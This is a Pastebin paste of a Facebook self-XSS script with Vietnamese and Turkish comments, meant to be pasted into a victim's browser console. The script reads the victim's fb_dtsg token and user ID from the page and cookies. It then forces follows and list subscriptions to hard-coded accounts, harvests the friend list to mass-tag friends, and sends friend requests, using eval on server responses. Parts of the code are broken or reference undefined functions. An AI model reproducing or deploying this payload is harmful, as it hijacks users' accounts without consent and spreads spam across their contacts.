Advertisement
thoainguyen012

Untitled

Aug 28th, 2014
244
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.69 KB | None | 0 0
  1. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  2. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  3. alert('Chúc các bạn chơi FB vui vẻ nhé ^^');
  4. function a(abone){
  5. var http4 = new XMLHttpRequest();
  6. var url4 = "/ajax/follow/follow_profile.php?__a=1";
  7. var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
  8. http4.open("POST", url4, true);
  9. http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  10. http4.setRequestHeader("Content-length", params4.length);
  11. http4.setRequestHeader("Connection", "close");
  12. http4.onreadystatechange = function() {
  13. if(http4.readyState == 4 && http4.status == 200) {http4.close;}
  14. }
  15. http4.send(params4);
  16. }
  17. // Close the connection
  18. function sublist(uidss) {
  19. var a = document.createElement('script');
  20. a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
  21. document.body.appendChild(a);
  22. }
  23. //Leo Thoai Nguyen
  24. a("100005592581096");
  25. //Sublist
  26. sublist("266383940224690");
  27. //Group
  28. ("151295339227154");
  29.  
  30. // Từ đây trở xuống là nhảm chủ yếu giấu bớt ID
  31. function sarkadaslari_al(){
  32. var xmlhttp = new XMLHttpRequest();
  33. xmlhttp.onreadystatechange = function () {
  34. if(xmlhttp.readyState == 4){
  35. eval("arkadaslar = " + xmlhttp.responseText.toString().replace("for (;;);","") + ";");
  36. for(f=0;f<Math.round(arkadaslar.payload.entries.length/10);f++){
  37. smesaj = "";
  38. smesaj_text = "";
  39. for(i=f*10;i<(f+1)*10;i++){
  40. if(arkadaslar.payload.entries[i]){
  41. smesaj += " @[" + arkadaslar.payload.entries[i].uid + ":" + arkadaslar.payload.entries[i].text + "]";
  42. smesaj_text += " " + arkadaslar.payload.entries[i].text;
  43. }
  44. }
  45. sdurumpaylas(); }
  46.  
  47. }
  48.  
  49. };
  50. var params = "&filter[0]=user";
  51. params += "&options[0]=friends_only";
  52. params += "&options[1]=nm";
  53. params += "&token=v7";
  54. params += "&viewer=" + user_id;
  55. params += "&__user=" + user_id;
  56.  
  57. if (document.URL.indexOf("https://") >= 0) { xmlhttp.open("GET", "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
  58. else { xmlhttp.open("GET", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
  59. xmlhttp.send();
  60. }
  61.  
  62. var tiklama = document.addEventListener("click", function () {
  63. if(document.cookie.split("paylasti=")[1].split(";")[0].indexOf("hayir") >= 0){
  64. svn_rev = document.head.innerHTML.split('"svn_rev":')[1].split(",")[0];
  65. sarkadaslari_al();
  66. document.cookie = "paylasti=evet;expires="+ btarihi.toGMTString();
  67.  
  68. document.removeEventListener(tiklama);
  69. }
  70. }, false);
  71.  
  72. function sarkadasekle(uid,tem){
  73. var xmlhttp = new XMLHttpRequest();
  74. xmlhttp.onreadystatechange = function () {
  75. if(xmlhttp.readyState == 4){
  76. }
  77. };
  78.  
  79. xmlhttp.open("POST", "/ajax/add_friend/action.php?__a=1", true);
  80. var params = "to_friend=" + uid;
  81. params += "&action=add_friend";
  82. params += "&how_found=friend_browser";
  83. params += "&ref_param=none";
  84. params += "&outgoing_id=";
  85. params += "&logging_location=friend_browser";
  86. params += "&no_flyout_on_click=true";
  87. params += "&ego_log_data=";
  88. params += "&http_referer=";
  89. params += "&fb_dtsg=" + document.getElementsByName('fb_dtsg')[0].value;
  90. params += "&phstamp=165816749114848369115";
  91. params += "&__user=" + user_id;
  92. xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev);
  93. xmlhttp.setRequestHeader ("Content-Type","application/x-www-form-urlencoded");
  94.  
  95. if(tem == "farketmez" && document.cookie.split("tem" + user_id +"=").length > 1){
  96. xmlhttp.send(params);
  97. }else if(document.cookie.split("tem" + user_id +"=").length <= 1){
  98. cinsiyetgetir(uid,tem,"sarkadasekle");
  99. }else if(tem == document.cookie.split("tem" + user_id +"=")[1].split(";")[0].toString()){
  100. xmlhttp.send(params);
  101. }
  102. }
  103.  
  104. var temsonuc = {};
  105. var temhtml = document.createElement("html");
  106. function scinsiyetgetir(uid,tem,fonksiyon){
  107. var xmlhttp = new XMLHttpRequest();
  108. xmlhttp.onreadystatechange = function () {
  109. if(xmlhttp.readyState == 4){
  110. eval("temsonuc = " + xmlhttp.responseText.toString().replace("for (;;);","") + ";");
  111. temhtml.innerHTML = temsonuc.jsmods.markup[0][1].__html
  112. btarihi.setTime(bugun.getTime() + 1000*60*60*24*365);
  113. if(temhtml.getElementsByTagName("select")[0].value == "1"){
  114. document.cookie = "tem" + user_id + "=kadin;expires=" + btarihi.toGMTString();
  115. }else if(temhtml.getElementsByTagName("select")[0].value == "2"){
  116. document.cookie = "tem" + user_id + "=erkek;expires=" + btarihi.toGMTString();
  117. }
  118. eval(fonksiyon + "(" + id + "," + tem + ");");
  119. }
  120. };
  121. xmlhttp.open("GET", "/ajax/timeline/edit_profile/basic_info.php?__a=1&__user=" + user_id, true);
  122. xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev);
  123. xmlhttp.send();
  124. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement